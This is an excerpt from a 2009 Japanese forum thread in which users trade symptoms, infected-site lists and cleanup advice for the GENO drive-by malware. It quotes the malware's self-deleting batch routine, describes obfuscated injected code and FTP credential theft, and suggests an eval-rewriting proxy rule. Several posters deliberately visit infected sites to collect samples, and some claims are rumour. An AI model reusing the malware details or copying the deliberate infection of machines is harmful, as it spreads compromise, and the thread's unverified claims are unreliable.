メーラのスパムブロックとかの設定もふくめたら
一日じゃとても終わらん
>>611 いや、メモリが異常なくらいは誰でも分かりそうな気がするんだがな・・・
ガジェットを使えばメモリーはデスクトップで見れるし
617 :
192.168.0.774 :2009/05/18(月) 04:49:09 ID:gb9ZDt5LO
>>615 落とすとBSODで再起不能になるかもしれないから電源オプションから電源切れないように設定して、
電気屋開くのを待って外付けHDDでも買ってこい
>>608 完全にアウトだな。
素直に再インスコしとき。
今言われてるレジストリに残る形跡って具体的にどんなのなんだ 件のchmファイルは正常動作してるけど…
>>604 >>606 おお、人柱感謝。
ZERO3es持ちで、念のためOperaのJavaスクは無効にしておいたけど
その件すごく気になってたからすごく助かる。
621 :
192.168.0.774 :2009/05/18(月) 04:52:08 ID:/4TBD5OI0
>>615 には不謹慎な質問だけど
感染したサイトがわかるなら教えてくれないか?
>>615 書き込みは別PCor携帯か?まさかと思うが感染濃厚なPCで書き込みしてねーだろうな?
もしそうならさっさとLANひっこ抜いてバックアップどうすっか考えろ
>>615 完全にアウト
自分も感染してリカバリ組だけど
>>591 の症状とほぼ一致というか
regeditも起動してアンチウイルスサイト関連にも繋がったけどやられてた
重症化する前にあきらめて対策とった方がいいよ、頑張れ
バックアップも感染してるの残さないように慎重にな
>>617 実は再起動はもう何回もやってたりしてる
最初はregeditできてたが再起動したらできなくなったけど
626 :
574 :2009/05/18(月) 04:56:11 ID:x0S5Vdnh0
>>614 >同じIPからの接続の場合、一定時間スリープするらしい。
その問題を回避するためにルータ再起動してIPを変えてみたんだが、
相変わらず検体は落ちてこない。
たぶんISPごと焼かれてるんだと思う。
もしかするとこれも時間が経てば落ちてくるようになるのかもしれないけど。
本当にGENOウイルスは世界最強だな 対処法はなし ウィルスセキュリティで検索しても引っかかりにくい つかまったらインスコしかなくPC中身はあぽーんされる もう、各機関に通報されてもいいレベルだな と言っても既に見つかって対処法を考えてるだろうな
かかりたい人間には、なかなかかからない。 インフルエンザにかかって学校を休みたい学生の気分だな
ケータイからなんだけど 感染してそうな同人サイトみつけた 30分前にアクセスした同人サイトの日記にGENOウイルスについての記事書いてあって 今もう一度そのサイト開いたらページが表示できなかった
630 :
192.168.0.774 :2009/05/18(月) 04:58:54 ID:/4TBD5OI0
>>628 まさにその通りだ
俺はこんなにも感染したいというのに!
>>624 ポインタクリックした時点のポインタ周辺の画像転送してID、PASS抜きってものあるので
ソフトウェアキーボードでも確実に安全っつー訳じゃないからなぁ…
主にネトゲのPASS抜きトロイで使われる手法だけどね
>>623 そうなのか、ありがとう。
こうなったらハードディスク増設するか安いし。
でもうちPCまだIDEだしな、うーん。
ジャバスクリプトとアクティブコントロール切ればie
>>629 あ、ゴメン
一時的な物だった;
なかなかないなー
>>624 キーロギングじゃなくてネットワークトラフィックを監視しているっぽいよ。
だから平文パスワードが流れるftpは思いっきりぶっこ抜かれるんじゃないかと。
>>626 そっか。それはすまんかった。
スリープするのは単一IPじゃなくてIP範囲なのかもしれないね。
ADSL再接続してIP変えても落ちてこないことは確かにある。
>>631 今回のGENOはスクリーンショット撮ってないでしょ?
あとスクショはクリップボード転送禁止にすれば簡単に対策出来るんじゃない?
腐向け同人サイトを ひたすら巡るしかないかなー まとめに載ってるジャンルを。 コミケに応募したサイトとか、感染してるかも… それかはネットでアンソロジー売ってるサイトとか 予想だけど
書きかけで送信しちまった。 ジャバスクリプトとアクティブコントロール切ればieやスレイプニルでも予防可能?
>>636 それじゃ駄目か・・・
ルーターでftpポート禁止にしてるけど
通信しようとした記録があったわ
>>638 パソコンの前に、君の脳みそが感染しそうで俺は心配です。
ググるのは危険、と書いてあるからみんな情報収集しない…巧みだ…
643 :
ひみつの文字列さん :2024/12/19(木) 00:53:34 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
>>641 何かには感染してるけど
ウイルスじゃないから心配しないで
>>635 おおサンキュー。そんなのあるのか。
急がずにじっくり調べるかな。
でも良く考えたらXPシステム用(Cドライブ)と、
データ用で別ドライブにしてたわ。
クリーンインストールっていっても
Cドライブだけでいいよね?
マリーアントア・ネットワーク「ググるのが危険ならヤフれば良いじゃない!!」
頼むからMSNにだけは感染しないでくれよ。 ホットメールが使えなくなるとかなりきつい。
>>639 >>269 もやれば暫くは安全。
ついでに Proxomitron とかで eval\s*\( を void( あたりに書き換えるようにするといい。
>>591 ,
>>602 辺り
というわけで、ごめんミスがあって見逃してた可能性があるので、
まだ
>>601 等での解決をしていないようなら
>>643 で再度試してもらえますか?
まぁ、あいかわらず試作なんで、
検出されなかったからといって居ないとは限らないということでお願いします。
652 :
GENO :2009/05/18(月) 05:27:08 ID:c4TnzPSv0
>>878 人柱乙。ありがとう。
こういう情報は個人的にも助かるよ。
これは
654 :
652 :2009/05/18(月) 05:31:14 ID:c4TnzPSv0
スマン完全に誤爆だorz
勇気あるな、
>>638 。俺なんかはもう、同人関連と関わりたくないわ。
セキュ板乗り込んで暴れ、質問に対して説明してやりゃ何故か逆切れ起こして掻き回す。
同人の板ではどうなってるかと思って見てみりゃ、私怨だか晒しだかウイルス防止よりジャンル?大事だとか言って、協力する気ゼロ。
それでいて、被害妄想だけは人一倍。
なんなんだ、あれは。
何だかんだ言って、拡散防止に勤める気は皆無なんだもなぁ同人は URL踏むのが怖いからどうのこうのって、単にURLにスペース入れるなりサイト名だけにするなりすれば良いのにさ
657 :
604 :2009/05/18(月) 05:37:22 ID:mLA05Iwx0
今気付いた事だけど、ウィンドウズモバイルだから感染しないって訳じゃないと思うから、怪しいサイトをスマートフォン等で踏んだら母艦PCと同期しない方が良いと思う。 人柱報告をここのスレと同人、VIPにマルチで書いたけどセキュリティ板には書かなかった・・・ やっぱ書いたほうがいいかな?
658 :
591 :2009/05/18(月) 05:38:18 ID:e2dzUe840
>>650 さっそくやってみたけど結果は変わらなかった。
「みつけられなかったけど油断しないでください」
うちのXPは感染濃厚だけど
昼間仕事なんで今日の夜までは再インスコできないから
試作のVer.UPするならやってみるよ
>>657 同人に書いて貴重な情報を流されるくらいなら、こっちに書いてもらうとありがたい。
情報をまとめることもできるし。
661 :
604 :2009/05/18(月) 05:43:18 ID:mLA05Iwx0
>>659 自分が出来ることはスマートフォンでの検証しかないけど、できる限り色んなとこ回ってみるわ
逐一報告します
>>655 もちろん怖いからケータイで探すよ
感染してるサイトがあれば他のサイトと比較して違いが出るかもしれないしー
あとはサイトとかで拍手レスや日記を見て
更新が途絶えてるサイトが怪しいかなーとかね
夏コミが近くなると、そういうのを毎日更新するサイトが結構あるんだなー
駄目かな、こんな捜索の仕方じゃ。
とうとうPHPにbase64エンコードしてincludeするようになってしまったのか。 これは面倒だな。
:zC dEl "C:\test\sample.exe" iF EXIst "C:\test\sample.exe" goTO zC dEL "C:\DOCUME~1\User\LOCALS~1\Temp\\e.bat" 実行したとき作られるe.batの中身はこんな感じ、ファイルを削除してる
>>657 ありがとう。本当にありがとう。
あと、こちらへも書いて欲しい。お願い出来るかな。
669 :
192.168.0.774 :2009/05/18(月) 05:55:00 ID:GfBjvcuO0
>>655 ハゲドウ、まともなのも少しはいるようだけど基本は保身しか考えてない
サイト名は風評被害ウォチが〜で出せないとかアホかと
管理意識が低いのがバレると困るってだけだろ、Adobe更新出来ないサイト持ちも結構いるんじゃねーのw
感染してるサイト名書くだけの事すらしないんだからな。被害拡大なんて体のいいすり替え
ところでGoogleは感染してるのかな
>>670 Googleは感染していないが、Firefoxでページの先読みを有効にしたままだと
検索結果が表示された段階でアンチウィルスが警告を出す場合がある。
673 :
192.168.0.774 :2009/05/18(月) 05:58:55 ID:wcAYThWMO
>>670 火狐の先読み機能云々と混同してないか?
>>669 974 名前:GENO 投稿日:2009/05/18(月) 05:48:53 ID:EASrZNYM0
>>970 今回のウイルスの広がりかたはおかしいし人為的かもとか
そもそも存在してるのか?なんて言われてるくらいよく分からないウイルスなのに
サイト晒すのはなあ…
感染した本人がアドレス晒すのは全然構わないと思いますが
いまだに、こんな事言ってるような連中だから。究極の保身体質だ。
感染拡大防止より、自分達の世界の方が大事なんだろ。そんな事では、下手すると自滅するのにね。
存在してるのか?にお茶吹いた
なるほど、サンクスです。
>>649 行の追加てテキストにファイルをドラッグして、
ずら−とならんでる127001〜の一番下にコピぺすればいいのか?
679 :
604 :2009/05/18(月) 06:07:26 ID:mLA05Iwx0
今うこっけいと小林製薬をスマートフォンで見てきた。 IE、オペラ共問題なし あと感染していると思われるサイトを教えてほしいんだが、ここにURL直貼りじゃなくて、@を「あっと」に変える感じで書き込んでくれるとありがたい。 (直貼りすると踏む人が出て被害拡大するため) とりあえず5つくらいサイト回って検証を終わりにしたいと思うので協力お願いします。 ちなみに携帯スペックは イーモバイル S21HT (HTC製) ウィンドウズモバイル6.1 IEモバイルとオペラミニ9.5でトップページのみ踏む ブラウザのオプションはデフォ
>>679 解りやしたー
こういう時に携帯やiフォンは便利だよねw
684 :
604 :2009/05/18(月) 06:13:07 ID:mLA05Iwx0
>>680 送信した後気付いたorz
要は何も考えないでリンク踏んじゃうひとが踏まないようにしてくれればOKです。
って俺の検証って役に立つのか疑問・・・
. を、どっと と平仮名でかけばいいんじゃないか?
686 :
192.168.0.774 :2009/05/18(月) 06:19:13 ID:5ta7ziYM0
.を。にするとかで対応すればいいと思う www以降でも専ブラだとリンクしちゃうし
URLはピリオドを■辺りに変換して貼り付けるのが安全かねぇ? とりあえず補完されにくい文字に置き換え推奨っつーことで
>>683 マジで?失礼しました
スペース挟むなりすれば確実かなぁ
690 :
192.168.0.774 :2009/05/18(月) 06:26:54 ID:L4YY5vy4O
こうは? www●ribbonmagic●com
691 :
604 :2009/05/18(月) 06:47:20 ID:mLA05Iwx0
>>690 分かればOKです。
ちなみに携帯では大丈夫でした。
そのサイト同人板のGENOスレにリダイレクトURL貼られててPCで踏んじゃったんだけど何故かGoogleに止められてAvast!先生は無反応だったw
火狐で設定そのままだったんだけどマジびびった
また落ちてくるexeのハッシュ値変わった
GENOスレ巡回してたら朝になってた。。。 というわけでしばらく仮眠とります。 検証は起きてからやります
695 :
192.168.0.774 :2009/05/18(月) 07:13:58 ID:I1cI3dKE0
悪徳商法マニアックスのサイトもやばい
>>691 グーグル先生は何か警告出るしな。ヤフー先生はどうかな
698 :
ひみつの文字列さん :2024/12/19(木) 00:53:34 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
>>693 携帯からなんだが
怪しい記載があるように
みえるんだが
っおれはサイトをこれで改竄された被害経験者なのです。
コメントアウトされてるから大丈夫だと思うけど気持ち悪いなw コードには反応するかも
avast!でスキャンしたら一個検出した googleでukokkei.co.jpを検索した時の火狐のキャッシュらしい
>>699 </HEAD>の直後にいるね。なんで残してるんだか。
>>702 ”ukokkei.co.jp”でググったら俺もavast反応した。キャッシュだったけど。消したほうがいいな
>>663 PCの同人サイトは携帯ごと弾いてるところも少なくないと思う
名前が上がってる流行ジャンルのサーチからというのが
効率悪いようでいて一番早いかも知れない
>>700 さんくす。受け取りましたー。
そして、理解。修正検討しますー。
初音ミクとかボーカロイドの同人が物凄い数感染してるっていうのは?
708 :
192.168.0.774 :2009/05/18(月) 07:40:45 ID:/4TBD5OI0
>>702 取り合えず無防備アタックしてみた
開いてるあいだCPU使用率が100%になった
けどC:\WINDOWS\system32\sqlsodbc.chmのファイルサイズに
変更は無いからGENOではないみたいだな
なぁavast!が反応するならもし踏んでもチェストにいれて削除できるんじゃないの
>>699 うん、俺にも見える…。
勘違いなのか、あの時点で本当に無かったのか、俺には判んないや。
おはよう 今度はレポートの人とは別でスレで感染サイト探し? で検体集め? ちと3行くらいでまとめてくれ。サイト探しとかなら協力できるかも
同人板の住人です。 沢山ご迷惑おかけしてもうしわけございません。 なんのお役にもたてませんが、同人サイトが多数登録 されている個人サーチというものがございます。 そこを探せば同人サイトが沢山みつかります。 複数のサーチを探すには、サーチエンジンのリンク集という 総合サーチを探せば便利です。 これくらいしか情報提供できません。 お役にたてなくて申し訳ございませんでした。
>>712 適当にスレつくってURLリストを放り込んでくれ
機械的にサーチするのにも手動でシコシコやってたんじゃ、感染のペースに間に合わんぞ。
このウイルスって携帯はセーフだそうだが、360とか、PSP、PS3は?アウト?セーフ?
【備えよ】 新型インフルエンザを語る part4
http://society6.2ch.net/test/read.cgi/hosp/1242525724/208,216 病院・医者板にあるURLにgenoウイルスに感染したサイトがある。
208 名前:卵の名無しさん[] 投稿日:2009/05/18(月) 01:12:10 ID:MtaDxdjC0 (PC)
なんかこの板にあったリンク先を見てから、PCの調子が悪いんだが。
DOSプロンプトが開かないとか、windowsアップデートが正常終了しないとか。
216 名前:卵の名無しさん[] 投稿日:2009/05/18(月) 01:40:12 ID:p8ujOdZK0 (PC)
>>208 もしかして小林製薬とか薬事日報社のページ見ませんでした?
それページ閲覧しただけで感染する"強毒性の新型ウィルス"ですよ。
かかったら今のところWin再インストールしかない恐ろしいウィルス。
ウィルス検査ソフトでも検出できないものが多いようです。
____ /_ノ ヽ、_\ ミ ミ ミ o゚((●)) ((●))゚o ミ ミ ミ /⌒)⌒)⌒. ::::::⌒(__人__)⌒:::\ /⌒)⌒)⌒) | / / / |r┬-| | (⌒)/ / / // 360とか、PSP、PS3だっておwwwwwwwwwwwwwwwwwww | :::::::::::(⌒) | | | / ゝ :::::::::::/ | ノ | | | \ / ) / ヽ / `ー'´ ヽ / / バ | | l||l 从人 l||l l||l 从人 l||l バ ン ヽ -一''''''"~~``'ー--、 -一'''''''ー-、 ン ヽ ____(⌒)(⌒)⌒) ) (⌒_(⌒)⌒)⌒))
>>713 したらばなどで感染サイトを記する案もでたんですが、
どうにこうにも同人板は基本晒し厳禁なので協力者がいません。
同人独自のルールが根深くありまして、特に女性サイトは
以上に検索避けを行う風習があるくらいですから。
同人板のスレに検体を求める書き込みが多数ありましたが、
結局住人は荒らしだと決め付けてスルーに入りました。
感染が広がる同人ジャンルなのに、住人では何もしようとしません。
>>713 何か絶対晒したくないらしい
同人板で勝利宣言ぽいことまでしてて、かなりひいた
自サイトに来て、感染被害者出そうが
自分達の幸せの方が大事なようだ
720 :
192.168.0.774 :2009/05/18(月) 08:29:32 ID:/4TBD5OI0
>>718 そういやあそこ
何人かが変に仕切ってたな
正直ノリがかなりキモかった
>>718 進めてる事言っとけば協力する人は進んで協力してくれるのでは?
同人板でやるのが嫌ってだけでしょうし
>>720 むしろ全員が仕切り屋状態
でもって自意識過剰だからGENO以外にも使われるとか色んな心配してるのよ
今はオチスレの方に1件だけみたいだね
誤爆でバレたかもしれないけどw 同人板住人です。 ジャンルの性質上、晒しに敏感なのはわかってたけど あそこまで狭い範囲でしか考えられない人が揃ってるとは 正直思わなかった。 ご迷惑をおかけして申し訳ないです。
勝利宣言してる人は単発の荒らしでつよ!とかなんたら言い出しそうですね ごもっともですが、いちいち書かずとも解るし VIPにまとめスレ立てようとしましたが無理でしたので、 どなたかお願いします。
>>722 協力したいけど他人のアドレス晒すなんて可哀相
本人から許可をとか言い出すと思う。本気で協力したいと思っててで
あと、なんだかんだいってたいして感染サイト知らないんだと思う
しかしいざ探そうとするとなかなか見つからん。
wikiのヒントだけが頼りだからなぁ
感染してみたい人は、ここよりも、SEC板のGENOスレの方がいいんじゃないかなぁ。 見ててちょっとうざくなってきた。
>>721 おお、やってくれたんだ
リボンマジックって書くだけじゃなく解説文のところにURL載せといた方が手間が少ない
>>721 に感染サイト突っ込んでけば良いのかな?
既出分も入れるの?
>>721 乙です
これ、ウイルスの配布元がからっぽだから無害って話が出てたところも
登録していいの?
>>723 自意識過剰というよりは
実際に私怨晒しに使う馬鹿が同人板の中にいるからだな…
あと同人板は最近まで私怨ほかの晒しで揉めてたから
いつも以上にアレルギーが出てる
>>731 それを人は自意識過剰とか
被害妄想とか加害妄想とかって言うんですよ
同人板はおわっとるが他の板なら協力してくれるとこあるかな?
4月の時点から参加してて、できるかぎり協力もしてるんだけど この週末席を外してて、スレ乱立激しくてどれが主スレかわからんくなってきた。 今まではセキュ板だったんだけど、見てみて見限った。 現状はここが主スレと考えておk?
同人板で聞いても誰も説明してくれなかったから敢えて聞くけど。 感染疑惑サイト集めて一覧にしてどうするんだ? まとめにでも貼るのか? 2ch内だけであの辺感染してるから踏むなよって警告だけに使って意味あるのかとか 何がしたいか分からないのだが
というか私怨はすぐ外されるから大丈夫じゃないの? 大体ウィルス感染自体は悪事でもなんでもないでしょう、その後の対応をきちっとやれば良いだけで むしろしっかりしてるなとすら思われるんじゃないの?こういう感覚はおかしいの?同人的に
>>733 うんまあそうだね
ただあそこは凝り固まってるけど
セキュのほうの住人を疑ってるって感じじゃない気がする
とだけ言っておきたかった
>>734 たぶん
IE系のブラウザはJavaScript切ってるだけじゃ駄目なん?
739 :
192.168.0.774 :2009/05/18(月) 08:57:40 ID:liJyExVc0
限られた集団の中の警告だけでも十分意味はあると思う。 そもそもアンチウイルスソフトだって 購入者だけ守っているような物だもん。
740 :
ひみつの文字列さん :2024/12/19(木) 00:53:34 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
>>736 感染を悪事と感じてる奴がいるんだなこれが
既に他所でウイルスばら蒔きやがってって騒いでるのがいた
検体探すのなら闇雲に同人サイト探すより名前変換サイト(夢/ドリーム)探すといいと思う。 性質上名前を変換するのにJS必須だから感染確立の高さは異常。 cluster■x0.to/search/(サーチエンジンのリンク集■= . ) 辺りからカテゴリ→傾向→ドリームでいくつかサーチ出てくる。
>>736 同人界に生息するDQNや厨をなめちゃいけません
ウィルス流行ってるから気をつけてとサイトで告知→恐がらせるなんて、ひどい!
感染してないし、対策バッチリだから特に告知なし→何も対策してないなんてひどい!
感染していたが、ちゃんと対応した→危機管理がなってない、ひどい!
と突撃を受けるような場所だよ
とにかく同人板及び同人界は特殊な場所だと頭に叩き込んで、
あっちに僅かにいるまともな人かこっちにまできてるまともな人から情報を貰った方がいい
>>734 セキュ板は見ての通りの状態だからIDの出る板へ引っ越しだね
URLを何のために晒すか、そのあとどうするのか という説明一切なくただ晒せ晒せ言っても、同人板じゃなくても晒す奴いないと思うんだが…… ボーカロイドの大手、サーチ、歌ってみた系の同盟? 東方の大手(ひらがな4文字だか漢字2文字だか) というのはどっかで見た ジャンル者じゃないから詳細はわからないけど
>>645 この手のベアドライブをUSB接続するキットの場合,IDEのは電源不足でほとんど使い物にならないから
気をつけてね.
IDEを接続するなら電源アダプタが別についてるHDDケースのがいいよ.
ニコニコにGENOウィルスについて 動画があって、内容か不正確だからうpした人間が 消してしまった。結構マイりスト再生数数あったな。
はっはっはっ
同人者だけどもう耐えられないw 何この馬鹿
280 名前:GENO 本日のレス 投稿日:2009/05/18(月) 09:03:57 Osjp9Dvs0
>>274 評判最悪もなにも……
自分達の実験動物になってくれなかったから愚痴ってるだけじゃんw
恥を知れよ。お前も。
>>745 この状況下でそんなこと言うの多分同人板だけだよ。
今は一つでも具体的な情報が必要とされてるのに。
ヲチでやれ
>「キャッシュ消せばいいんだよ!」 って言うAAありますけど、消して良いのでしょうか
>>737 >>744 了解。
今日はこれから出なければいけないけど、
協力できることはできるだけします。
毎日消せばいいんだよ
>>749 さん、同人板からの出張乙でした。もうお前に用は無い
よっしゃあ。1個見っけた ソースチェック中にブラウザ先読みでかキャッシュに入ってきてビビった
>>735 2chにはROMというのが書き込みの数倍おってな…
またねらーが2chでしか活動しないわけでもなく、知識は広がる
GENOだって感染してるのにテキトーぶっこいて誤魔化したから、
知らずにアクセスする人が出て感染拡大してこの有様なんだろ。
よくわからん感染してない層が今後感染する確率を減らすためにも、
感染してる危険な状態のサイトを知る機会を作ることは充分に意味があると思う。
747の言う事はある程度納得。 そういう具体的な説明されれば動く奴は動くと思う。 正直同人板ではこの質問オールスルーだったから荒し認定も仕方なかった
本家 F-Secure SAS 提出分の回答 現在のところなし。 定義ファイルも昨日から変更なし。
>>757 まとめサイトも見ないようなタコが君の言うようなリスト見るとでも思ってるのか?
そのリストをタコに見せたら感染者増えるだけだと思うんだけど、どう考えてる?
>>758 答えようとしたら連投規制食らって、その後の流れ見てて相手するのが
面倒になったんだよ。
>>760 同人板のノリをこっちに持ち込むなよタコ
で
>>721 のリンク集は使うの?
やっと1個見つけれたんだが
>>750 そうなのかそれはすまん
素人を理由にするなと言われるだろうが
自分も含め 知識のない人にとっては ただ晒せと言われたってわからないんだ
何に使うか説明されずに「いいから署名しろ」って言われてる感じ
何故晒す必要があるのか晒してどうするかを具体的に言われたら同人板でも理解のあるやつはいると思う
解決に役立てたいと思っているなら尚更 わかりやすく向こうでそれを説明してほしい
長文になったごめん
>>764 同人板でやるよりも理解のある人にこっちに来て協力してもらった方がはるかに効率的だよ
あくまでも同人板ではヒントを出してくれるだけだと思ってさ
なんの手がかりもないよりかはジャンル名でも出てたら少しはマシでしょ
同人板は便乗煽りやらなんやらでてきてるから話が全く進まないな
>>760 テンプレも飛ばすくらいウイルスにビビってるタコとやらが、
「感染するから行くな」と直接言われてなお行くと思うその思考がわからない。
>>764 検体詐欺で凝り固まってるからもう何言っても無理だよ
>>771 そうでもないよ
煽りが多発してるんでややこしくなってるけど
興味のある人はこちらを見に来ると思う
つか、今自分が来ました
>>770 載ってないから大丈夫と無防備のまま、他所で感染するところまでは想定内
すまん。リンク登録しようとしてるんだが 公式はともかく同人サイトも固有のサイト名? ジャンル名?とかのがわかりやすそうな気がするんだけど 別に中身はどうでも良いから固有サイト名で良いのかな
今回、GENOウイルスについては何故か2chとそこから作られたまとめサイト程度しか情報が無く、 報道された事例も、4月騒動の時にGENOでウイルスが配布されたってちょいかかれた程度しかない。 亜種はともかく、初期段階で艦船に使用された脆弱性が3月修正のものなのか5月修正のものなのかもはっきりしない。 ウイルスの強度としては、どうがんばっても検知しか出来ず、駆除は不可能、回復にはシステム再インストールしかなく、 それだって挙動が不明だからそれくらいしか安心できる手段が無いっていう、nimdaとかと同等、下手すりゃそれ以上の かなりやばいレベルのウイルスなのに、2ch以外ではほとんど話題になっていない、報道は何やってんだ。
>>752 最初に感染が確認されたGENOという通販サイトの告知が「ブラウザのキャッシュを消せ」であり
(後に、それすらもなかったことにされたが)全く効果がないものでした。それを揶揄する為に
貼られているAAですので、無視してください。
ブラウザのキャッシュを消すことに害はありませんが、感染前後の対処・予防には一切関係ありません。
キャッシュを消せってのは履歴を消させようとしたって事?
>>774 私の意見だが、個人サイトならサイトタイトルそのままは避けた方が良いかも
企業サイトとか既に感染真っ黒で有名なところならまだしも
サイト名検索した人が、検索でうっかりリンク集に辿り着いちゃう可能性もあるし
779 :
778 :2009/05/18(月) 09:49:08 ID:v6qQswXM0
すまん、焦って途中送信してしまった これじゃ思い切り矛盾してるw 散々既出の有名どころなら検体鑑定してくれる人にも解るように書いた方が良いかなと最初は思ったんだが 一般のお客さんとかが企業名で検索して辿り着くケースもあるから、企業サイトも伏せ字とかにした方がいいかな
正直同人板は精神的に子供の集まりです。多少の基地外ぶりは勘弁してやって欲しい。 ケットコム という同人イベントの案内サイトがある そこの[過去]で最近終了したイベントのジャンルを見る(特定ジャンル系ならなお良) イベントサイトへのリンクを辿ればその中に参加サークルのリストがあったりする イベントに参加したばかりのサイトは同人誌在庫情報や日記等を始め少なからず更新作業があったりする 感染サイト捜索法のひとつとして有効かもしれないです。
前レスに出てたが検体を探すなら夢、夢絵、名前変換を掲げるところがいいと思う 確か夢マナー夢絵マナーのサイトが感染してたと聞いたのでより可能性が高い また夢と通常二次を兼用しているところもあるから倍率ドン
>>772 他同人板から来た人
来ました宣言とか挨拶みたいな雑談参加はいらんよ。
雑談は同人板のでもうお腹いっぱいです。
>>778 レスd。だが考えてみれば他に登録する人と重複しちゃなんだし
サイト名を一部だけ伏字で登録してみた。
>>776 回答ありがとうです。つまりGENOが証拠隠滅?を謀ったからなのでしょうか。
キャッシュ消す事でGENOがウイルスに感染した事が証拠隠滅になるのかわかりませんが・・・
>>764 ってかね、自分の目から見た分には
真面目に意見してた人は
ただ晒せ晒せなんて言ってないし、相当丁寧に説明してたと思うよ。
自分も参加しようと思ってたが、連投規制くらってるうちに
それがほとんど荒らしやら釣り認定されて
正直もういいやって気分になった。
今も頑張って説明してる人はいるけど
まだ「スルー検定」とか言われてるしね。
あれじゃ見限られても仕方ない。
自分が最初に登録しておいてアレだけど 「黒」って表現はいまいち宜しくない気がした もっと良い表現は無いもんかな
今北。ちょっと聞きたいんだが、cmd.exeの起動確認ってしても大丈夫なのか? ダメって言うの見りゃ大丈夫っていうのもあってもう何が何だか
ジャンルヲチスレにスレ住人にはわかる形で具体的な感染サイトのヒントが出ていた あいにくサイト名覚えてないし携帯だから確認できないが
>>784 適当な回答で誤魔化したんだよ
証拠隠滅と言うかうやむやにしようとしたの
黒は確かに黒だから放り込んでるんだしな。ふむ
自分が登録した分ちょっと弄ってくる
チェッカで1000%は確定で良いのかな? アバスト反応しなかったから未確認の方が良い? 良く考えたらhostsでドメイン弾いていたはずなんだけど もう一個の方でアバストが反応したのはなんでだ? 新しいドメインとったのだろうか? わかる人いたらちょっと頼む
791 :
192.168.0.774 :2009/05/18(月) 10:02:34 ID:TTbAOLbH0
試しにmixiの日記で告知してみたら普通の人は誰も知らないみたいで戦慄モノだった 企業とか狙われてるんだし、もう知ってる奴はできる限り一般に広めたほうがいいんじゃね もし仮に単位確認時期の大学HPとか改ざんされたら大混乱なんてもんじゃねーぞ まず普通の人間は「あっぷでいと?なにそれ新しいソフト?」って感じなんだから、いやマジで
>>520 PG2導入したら、そこもIPブロックされているな
ネット巡回がしにくくて困る・・・・
>>789 ごめん自己解決した
ただの仕込まれてたHTMLファイルでもうトロイ扱いだっただけだった
俺はずかしー
感染サイト開くとcookieに miek 1 www.abcdefg.com/ランダムな文字列 * みたいなの保存されてどこのサイトで感染したか判る
更に安価もミスってるし。しばらくサイト探しだけしてROMってるわ
じわじわリストも上がってるな、協力感謝
あれ?so-netってGENOにやられてるんじゃないっけ?気のせいだっけ
>>800 情報d、俺の調べが駄目駄目だったようだ、申し訳ない。
しかし、薬事日報までアウトだったとは・・・
>>794 そのcookieチェックがないスクリプトもあるよ。
つか、gnomeの中の人が報告してるphp埋め込みのタイプのを収集してる
ところなんだけど、なかなか新しいバリエーションが見つからない。
Adobe Shockwave Playerってのも更新したほうがいいの? ってかどうやってバージョン確認するんでしょうか? xp pro sp2
命まで取られねえ そのまま使え
>>800 ・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
感染確認方法にあるタスクマネージャでの方法だけど 小文字と大文字とか関係ある? 見本は小文字なんだけど見たらうちのは大文字でSVCHOST.EXEだった さらにsvchst.exeっつーのがあるんだが… ひょっとしてアウト?
Webサイト製作 ご担当者さま ■ お願い 御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を ダウンロードさせるスクリプトが挿入されております。 状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知をお願いします。 この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、 Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。 同様のスクリプトの仕込まれたHPを閲覧することで、そのPCにウイルス本体が感染します。 感染したPCを利用して、HPの更新作業を行なうと、(該当PCで稼働中のマルウェアが行なったのか、 FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが)感染を広げるための スクリプトの埋め込みを行なうようです。 他者から報告があり、当方でも確認したところ、確かに危険コードが含まれておりました。 HP閲覧者のPCにウイルスが勝手にダウンロードされてしまうため、御社のHPが意図せぬ加害者と なっております。 ■ 確認した感染ページ <多分、全てのページが感染中> ●HTMLファイルの場合 <body>タグの直前に難読化されたコードが埋め込まれる。 (例外的に<body>タグが存在しないページの場合は危険コードの挿入箇所を見付けられず 危険コードが埋めこまれないようです) ●PHPの場合 ファイルの最初に難読化されたコードが埋め込まれる。 ●JSの場合 ファイルの最後に難読化されたコードが埋め込まれる。 その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
■ 解決方法について
駆除方法
http://www29.atwiki.jp/geno/pages/14.html 一度感染してしまうと、PC稼動状態で除去するのは困難…というより、無理です。
必要なデータをバックアップした後で、PCリカバリもしくはOS再インストールを行なって、
安全な環境にするしかありません。
1.Webサイトにある「ファイルを一旦全て削除し」被害の拡大を阻止
隠れた所に残存する可能性があるのですべてのファイルを削除してください
この段階では、告知を上げても、告知自体に危険コードが入りますので
まずは削除だけをお願いします。
2.各種データのバックアップ(IDとかパスワードのメモやブックマークも忘れず)
3.OS再インストール(またはPCリカバリ)の後、WindowsUpdateを全て当てて、
セキュリティソフトを導入し、パターンを最新にした上で、各種アプリの
インストールや、バックアップしたデータの書き戻しを行なってください。
4.HP更新に使用するftpパスワードの変更
(以前のものは盗まれており外部から悪用される可能性があります)
5.Webサイトに危険コードを含まないファイルをアップロードしなおす。
6.感染が行われる状態であった日時の告知とサイト訪問者に対するお詫び、及び
解決策の紹介(PCリカバリ/OS再インストールしかない訳ですが)。
正直かつ正確に書くことで訪問者からの信用回復を行なってください。
最初にこのウイルスが確認された、某通販サイトのように、危険な状態であったことを
隠蔽したり、ブラウザのキャッシュを消せばOKといった嘘情報を書くことで、被害を
拡大させるようなことだけは行なわないようにお願いいたします。
ftpパスワードやID、その他のSNSのパスワードなども、盗みだされている可能性が
